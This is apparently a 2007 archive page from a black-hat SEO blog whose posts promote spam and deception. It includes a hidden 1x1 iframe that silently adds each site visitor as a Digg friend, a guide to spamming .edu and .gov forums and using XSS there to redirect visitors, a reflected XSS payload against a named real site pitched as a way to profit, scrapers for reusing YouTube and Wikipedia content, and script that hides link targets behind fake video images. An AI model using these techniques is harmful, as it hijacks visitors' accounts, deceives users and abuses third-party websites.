Monthly Archive for March, 2007

Digg Friend Exploit

Published
by
busin3ss
1 year, 7 months ago
. Comments

I’ve just found this here.

In what has got to be the stupidest move in the history of community features, Digg has created a URL-powered friend-adder. Basically, all you have to do is visit the url http://digg.com/invitefrom/{username} such as http://digg.com/invitefrom/russvirante and you automatically add them as your friend if you are currently logged in to Digg.

Add this to your site, and you will automatically add as your friend everyone who visits your site. Remember to change the last part for your Digg username.

1

<iframe height="1" width="1" src="http://digg.com/invitefrom/{username}"></iframe>

My First Hate Mail

Published
by
busin3ss
1 year, 7 months ago
. 13 Comments

I’m so excited! I have been blogging just for 24 hours and I’ve already received my first hate mail from Joe Cracker.

I don’t really know him, so I decided to check my server logs and oh boy, he really hates my blog. He hates it so much that he read everything a couple of times, and then he added me to his feed reader… Just to prove that he was extra pissed with me.

Here is the original message:

You are a noob because you fail to address how difficult it is to rank or those keywords via edu spam.

For one, the people who spam .edu sites spam THOUSANDS of guestbooks and forums thousands of times over. In addition you are competing with thousands of spammers. Out of all these millions of pieces of spam generated perhaps only a handful of them will rank for the competitive terms and only for a few days before the university IT staff deletes it or another spam message replaces it.

Your blog reads as if it were written by a script kiddie who just programed ‘Hello World’. I have read I few entires, and I suggest you do yourself a favor and delete this blog from your server. There are far better blogs out there that are written by people who actually know Blackhat instead of pseudo experts such as yourself.

Lastly, bluehat SEO indexing tool is GARBAGE. I tried it a couple months ago and it doesn’t work. All it does is propogate your link though a bunch of NO FOLLOW blogs and other shit. You know what DOES work? Good ol’ Backlinks!!! Who would have though.

I just want to point some stuff out about his message:

You are a noob because you fail to address how difficult it is to rank or those keywords via edu spam.
For one, the people who spam .edu sites spam THOUSANDS of guestbooks and forums thousands of times over.

I never said it was easy, did I?

In fact he is absolutely right, you need massive amounts of links pointing to your EDU page (Where you place a link or a redirect to your landing page) to rank for highly competitive keywords. Lets take as an example this URL that I’ve just found ranking for the keyword “ringtones”:

http://www.umes.edu/accsupport/ossd/ossdchat/0000008d.htm?ringtones

Just a forum post with a link to a landing page.

Now let’s analyze the backlinks of that site with Yahoo! SiteExplorer:

EDU Spam 2

15,559 links registered by Yahoo! - This can give you a pretty accurate ratio between the amount of competition and the quantity of links you need

As you can see, EDU spamming is not easy at all! Especially if you plan to compete against big brands and other search engine spammers.

Your blog reads as if it were written by a script kiddie who just programed ‘Hello World’. I have read I few entires, and I suggest you do yourself a favor and delete this blog from your server. There are far better blogs out there that are written by people who actually know Blackhat instead of pseudo experts such as yourself.

A few entries? Yeah right.

*.edu Spam

Published
by
busin3ss
1 year, 7 months ago
. 19 Comments

EDU Spam

Go to Google and search for ringtones, cialis, viagra or any other profitable niche and you will see something similar to the image above. This is called edu spam.

As you might know, *.edu and *.gov domains rank way better in search engines (Specially Google) than any other TLD, and that’s exactly why some search engine spammers are using those domains to promote their landing pages/affiliate sites.

How do they do it? Well if you look closely you might figure it out by yourself… But for those lazy ones here is a quick explanation of this technique:

  1. Find forums/guestbooks installed on *.gov and *.edu domains. You can find them with Google using a query like this: site:edu OR site:gov “Forum”
  2. Drop your link there - Most of them will accept live links, and if they are vulnerable to XSS you can do so much more like redirecting to your site automatically with JavaScript
  3. Make the spiders crawl that site (QUIT?)
  4. Repeat

Of course the moar the better, so you might want to code a tool to automate the process and get more links.

EDIT: Here you can find an example on EDU spamming (Scroll down to the bottom)

Increase your Link Popularity (Part I)

Published
by
busin3ss
1 year, 7 months ago
. Comment

There are a lot of things that you can do to create links and increase the link popularity of your sites. You can use XSS, comment spam, trackback spam, buy links (aff), link exchange programs etc.

In this part I’m going to explain one of the easiest ways to increase your link popularity: Directory Submission

Yes, I know that this is not a black hat technique so I’m going to keep it REALLY short and I promise that the next part will cover something much more evil… Muahaha!

PROS:

  • Cheap
  • Risk-Free
  • Easy to implement

CONS:

  • Time consuming

For this technique you can:

  1. Download this huge excel list and do it yourself: SEO Friendly Directory List
  2. Hire someone in DigitalPoint to do it for you for $10 - 15 USD (Here, here and here)
  3. Buy a directory submitting software

Easy, isn’t it?

Youtube Scraper

Published
by
busin3ss
1 year, 7 months ago
. 10 Comments

Another scraper, this time for Youtube:

USAGE:

1

<?php youtube("BMW") ?>

CODE:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<?php
function youtube($keyword) {
	$url = 'http://www.youtube.com/rss/tag/'.urlencode($keyword).'.rss';
	$youtube = fopen($url, "r");
	if (preg_match('/<enclosure url=\"(.*)swf/s', $youtube, $y)) {
		$youtube = $y[1];
		$youtube = substr($y[1], 0, 36);
		$video = '';
		$video .= "\n".'<object type="application/x-shockwave-flash" style="width:400px; height:325px;" data="'.$youtube.'">';
    	$video .= "\n".'<param name="movie" value="'.$youtube.'" />';
    	$video .= "\n".'</object>';
    	$video .= "\n";
    	print $video;
	}
}
?>

XSS Crash Course (Part I)

Published
by
busin3ss
1 year, 7 months ago
. Comments

XSS is a widely used method among search engine spammers (At least it was a couple of months ago.)

In this crash course I will try to explain what is XSS, how to find XSS vulnerabilities, how to protect your sites from XSS and the most important part… How to profit from it ;)
What is XSS?

Inserting HTML/JavaScript into a site truth vulnerable user input. For example, a search form, a comment box or even a “submit story feature“.

Real World Scenario

Imagine that you are surfing a really cool site (For example this one) and you want to submit it to your bookmarking site like Digg or Reddit. Let’s say that you are using Kudos.no for your bookmarks. So you click on the “submit it icon” and you get redirected to:

http://www.kudos.no/nysak/?kudosKnapp=1&url=anysite.com

If you take a look at that site, there is a form with the URL you want to submit.

Now let’s try another URL:

http://www.kudos.no/nysak/?kudosKnapp=1&url=othersite.com

As you can see, the &url parameter is inserted automatically in the form. Here is part of the HTML source code of that form:

1

<input type="text" name="storyLink" id="storyLink"  value="http://somesite.com" />

Everything seems OK, right? Now this is what is happening on the backend of the site:

1
2
3
4
5

<?php $story = $_GET['url'];
//some code
print '<input type="text" name="storyLink" id="storyLink"  value="'.$story.'" />';
//more code
?>

Everything you send in the &url parameter is being printed in that <input> tag, and without the proper sanitization that is a very bad idea. Here is why it’s a bad idea:

http://www.kudos.no/nysak/?kudosKnapp=1&url=http://somesite”><script>alert(”XSS”)</script>

As you can see, instead of just sending an URL, we are sending HTML too. Here is the source code of the page:

1

<input type="text" name="storyLink" id="storyLink"  value="http://somesite"><script>alert("XSS")</script>" />

Did you saw the alert pop-up? You have successfully injected your own JavaScript!

I’m working on Part II, meanwhile you can keep reading about XSS in this blog.

Boost your Technorati rank!

Published
by
busin3ss
1 year, 7 months ago
. Comments

The original articles can be found here and here.

This is a small step-by-step guide to increase your Technorati rank overnight.

First some background information. The Technorati rank is an index of popularity of your blog based on the number of the blogs that link to your blog, you can see the current rank by clicking here.

So the more links poiting to your blog, the better. Unfortunately not all the links are credited by Technorati, so we need to help them a little bit ;)

  1. Find all the URLs that have a link to your blog, you can do this with Xenu, Yahoo! Site Explorer or even this tool
  2. Use any pinging tool to ping each URL to: http://rpc.technorati.com/rpc/ping
  3. Watch your ranking increase!

QUIT - Quick Indexing Tool

Published
by
busin3ss
1 year, 7 months ago
. Comment

Today I’m going to write about one a very cool? (and free)? SEO tool: QUIT

What is QUIT?

QUIT is a SEO tool developed by BlueHatSEO.com. According to the site, QUIT is a tool that? “utilizes tons of techniques to get your site crawled and indexed VERY quickly.”

At first I was skeptical about this tool, but after some testing on my own I can tell for sure that works, and works really well! (If you don’t believe me, read the comments left by other people.)

This is great to give a boost start to all your spammy pages (Or even WH sites)

Happy indexing ;)

Wikipedia Scraper

Published
by
busin3ss
1 year, 7 months ago
. 13 Comments

Here is a snippet from [YACG] Yet Another Content Generator to scrape wikipedia articles. Great for content generation and arbitrage. Here is the code:
Usage:

1

<? wikipedia("http://en.wikipedia.org/wiki/Google") ?>

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

<?php
function wikipedia($article)	{
	$pattern[0] = '/<a href="(.*?)">(.*?)<\\/a>/';
	$replace[0] = '$2';
	$pattern[1] = '/<h3 id=\"siteSub\">From Wikipedia, the free encyclopedia<\/h3>/';
	$replace[1] = '';
	$pattern[2] = '/<div id=\"contentSub\">(.*?)<\/div><div id=\"jump-to-nav\">Jump to: navigation, search<\/div>/';
	$replace[2] = '';
	$pattern[3] = '/<div class=\"messagebox cleanup metadata\">(.*?)<p><br \/><\/p>/';
	$replace[3] = '';
	$pattern[4] = '/<table class=\"messagebox\" (.*?)>(.*?)<\/table>/';
	$replace[4] = '';
	$pattern[5] = '/<dl>(.*?)<\/dl>/';
	$replace[5] = '';
	$pattern[6] = '/<h1 class=\"firstHeading"\>(.*?)<\/h1>/';
	$replace[6] = '<h3>$1</h3>';
	$pattern[7] = '/<table class=\"messagebox protected\" style=\"border: 1px solid #8888aa; padding: 0px; font-size:9pt;\">(.*?)<\/table>/';
	$replace[7] = '';
	$pattern[8] = '/<div class=\"infobox sisterproject\">(.*?)<\/div><\/div>/';
	$replace[8] = '';
	$pattern[9] = '/<sup (.*?)>(.*?)<\/sup>/';
	$replace[9] = '';
	$pattern[10] = '/<table style=\"background: transparent;\" width=\"0\">(.*?)<\/table>/';
	$replace[10] = '';
	$pattern[11] = '/<table class=\"messagebox current\" style=\"font-size:	normal;\">(.*?)<\/table>/';
	$replace[11] = '';
	$pattern[12] = '/<table class=\"toccolours\" align=\"center\" width=\"55%\" cellpadding=\"0\" cellspacing=\"0\">(.*?)<\/table>/';
	$replace[12] = '';
	$pattern[13] = '/<div class=\"editsection\"(.*?)>(.*?)<\/div>/';
	$replace[13] = '';
	$pattern[14] = '/<div id=\"bodyContent\">/';
	$replace[14] = '<div>';
	$pattern[15] = '/<dd>(.*?)<\/dd>/';
	$replace[15] = '';
	$pattern[16] = '/<div class=\"messagebox cleanup metadata\">(.*?)<\/div>/';
	$replace[16] = '';
	$pattern[17] = '/<div class=\"thumbcaption\">(.*?)<\/div><\/div>/';
	$replace[17] = '';
	$pattern[18] = '/<div class=\"thumb tright\">/';
	$replace[18] = '';
	$pattern[19] = '/\[(.*?)\]/';
	$replace[19] = '';
	$pattern[20] = '/<table class="messagebox protected" (.*?)>(.*?)<\/table>/';
	$replace[20] = '';
	$pattern[21] = '/<div style="position:absolute; z-index:100; right:20px; top:10px; height:10px; width:300px;"><\/div>/';
	$replace[21] = '';
	$pattern[22] = '/<div style="position:absolute; z-index:100; right:10px; top:10px;" class="metadata" id="administrator">(.*?)<\/div><\/div>/';
	$replace[22] = '';
	$pattern[23] = '/<table class="messagebox current"(.*?)>(.*?)<\/table>/';
	$replace[23] = '';
	$pattern[24] = '/<table class="messagebox current" style="width: auto;">(.*?)<\/table>/';
	$replace[24] = '';
	$pattern[25] = '/<div class="dablink">(.*?)<\/div>/';
	$replace[25] = '';
	$pattern[26] = '/<b>/';
	$replace[26] = '<strong>';
	$pattern[27] = '/<\/b>/';
	$replace[27] = '</strong>';
	$pattern[28] = '/<div(.*?)>/';
	$replace[28] = '';
	$pattern[29] = '/<\/div>/';
	$replace[29] = '';
	$pattern[30] = '/<map(.*?)>(.*?)<\/map>/';
	$replace[30] = '';
	$pattern[31] = '/<img src="(.*?)" alt="This page is semi-protected." width="18" (.*?)\/>/';
	$replace[31] = '';
	$pattern[32] = '/<table style="width:100%;background:none">(.*?)<\/table>/';
	$replace[32] = '';
	$pattern[33] = '/<div class="messagebox merge metadata">(.*?)<\/div>/';
	$replace[33] = '';
	$wikipedia = fopen($article, "r");
	$wikipedia = preg_replace($pattern, $replace, $wikipedia);
		if (preg_match("/<\!-- start content --\>(.*)<table id=\"toc\" class=\"toc\" summary=\"(.*)\">/", $wikipedia, $w)) {
			$wikipedia = $w[1];
		} elseif (preg_match("/<\!-- start content --\>(.*)<a name=\"(.*)\">/is", $wikipedia, $w)) {
			$wikipedia = $w[1];
		} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"boilerplate metadata\" id=\"stub\">/is", $wikipedia, $w)) {
			$wikipedia = $w[1];
		} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"printfooter\">/is", $wikipedia, $w)) {
			$wikipedia = $w[1];
		}
	}
	print $wikipedia;
}
?>

The regex to remove all the trash that wikipedia adds to the articles sucks, so I’m looking for someone to help me with it. Interested? Drop me a line!

Clickbait

Published
by
busin3ss
1 year, 7 months ago
. Comments

Driving traffic to your site is not enough, you probably want users to click in something - Probably an ad. But you have to be creative, nowadays users are much more savvy and the old anchors like “Click here for free porn” are not enough.

For example, play the following Youtube video:

sexy1

As you can see, it’s not really a Youtube video… It’s a link.

You get the idea now? This could really come in handy for marketing in Hi5, Facebook, MySpace etc…

In the end, it all comes down to be creative and paying attention to the small details, so you might want to hide the links from the status bar with some javascript like this:

1

<a href="http://www.yourlandingpage.com" onmouseover="window.status='!'; return true" onmouseout="window.status=''; return true"></a>